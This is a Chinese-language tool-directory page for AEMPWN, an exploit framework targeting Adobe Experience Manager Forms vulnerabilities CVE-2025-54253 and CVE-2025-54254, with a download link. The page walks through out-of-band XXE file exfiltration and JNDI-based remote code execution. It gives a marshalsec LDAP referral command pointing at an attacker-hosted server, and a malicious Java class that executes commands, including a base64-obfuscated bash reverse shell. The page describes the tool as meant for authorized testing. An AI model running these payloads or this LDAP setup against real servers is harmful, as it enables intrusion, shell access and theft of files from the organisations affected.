Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
AEMPWN — CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE 框架 | Kitploit
工具/GitHubGitHub/zoomdbz/aempwn
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubzoomdbz/aempwn

AEMPWN

CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE 框架

查看仓库
327个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

AEMPWN

针对 CVE-2025-54253 与 CVE-2025-54254 的 AEM Forms 扫描器

AEMPWN 是一款针对性扫描器,用于识别高风险的 Adobe Experience Manager(AEM)Forms 漏洞,支持安全检测、盲外带(OOB)确认以及完整的概念验证(PoC)验证工作流。 此工具仅用于授权安全测试。

支持的漏洞

CVE-2025-54253 AEM Forms(JEE)中依赖配置的远程代码执行

CVE-2025-54254 XML 外部实体(XXE)注入,导致文件泄露并可能进一步升级利用

操作模式 AEMPWN 支持三种执行模式,以契合真实的漏洞赏金与红队工作流程。

  1. 安全 PoC 模式(--poc)

目的: 识别不安全的 XML 解析行为和可利用的攻击面,同时不触发破坏性行为。

验证内容: XML 反射 非 HTML 结构化响应 Canary 令牌反射 不安全 XML 处理指标

适用场景: 你需要低噪声验证 你仍在评估影响范围 在升级之前你需要一个安全信号 此模式适用于早期分诊和内部报告。

  1. OOB XXE 模式(--oob)

目的: 通过 AEM 服务器的出站请求确认盲 XXE。

重要说明: Burp Collaborator(或类似服务)仅观察出站连接。它们不能: 托管任意 DTD 文件 提供恶意载荷 返回攻击者控制的响应 支持 LDAP/JNDI 利用

因此,仅靠 Collaborator 不足以进行完整的 OOB XXE 利用。

你需要什么: 一个你控制的 HTTP 服务器(VPS、云实例、带隧道的本地服务器等) 能够提供 DTD 文件 能够观察入站 HTTP 请求和查询参数

这证明了什么: XML 解析器会获取外部实体 目标会发起出站网络请求 敏感本地文件可以被读取并外泄

  1. RCE 模式(--rce)

目的: 证明在 AEM 服务器上实现实际代码执行,以产生 P1 级影响。

此模式依赖于通过 XML 解析实现的 JNDI 注入,这需要 HTTP 回调之外的基础设施。

你需要什么: 一个运行中的 LDAP 服务器,能够提供 Java 类引用 一个托管编译后 Java 类的 HTTP 服务器 一个受控的执行原语(例如,文件创建、出站回调)

为什么需要 LDAP: XML 解析器尝试解析 JNDI 引用 这导致 AEM 服务器连接到你的 LDAP 监听器 LDAP 响应指向一个 Java 类 该类由 JVM 加载并执行

最佳工具:marshalsec

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-server/#Exploit" 1389

http://your-server/#Exploit = 提供 Exploit.class(已编译的恶意类)的 HTTP 服务器。

恶意类示例(简单创建 /tmp/pwned 或反弹 shell):

root@kitploit:~
Javaimport java.io.IOException;
public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("touch /tmp/pwned");
            // or reverse shell: Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {}
    }
} 

编译 → 托管在 HTTP 服务器上(可与 DTD 相同或分开)。 当 AEM 解析实体时 → 连接到你的 LDAP → 获取类 → 执行代码。

关键限制:

Burp Collaborator 不能: 提供 LDAP 响应 托管 Java 类 触发基于 JNDI 的类加载 因此,没有真正的 LDAP 服务,RCE 模式无法工作。

关于 Burp Collaborator Burp Collaborator(及类似平台)仅可用于检测。

它们可以确认: DNS 查询 HTTP 或 HTTPS 回调 盲出站连接

它们不能: 托管 DTD 文件 处理外泄的文件内容 提供 Java 类 支持基于 JNDI 或 LDAP 的利用

使用 Collaborator 进行观察,而不是传递载荷。

输出:

已确认的发现将写入输出文件(默认:aem-forms-scan.txt),包括: 目标基础 URL 受影响的端点 观察到的检测信号 特定模式的指标 适合视频 PoC

下载工具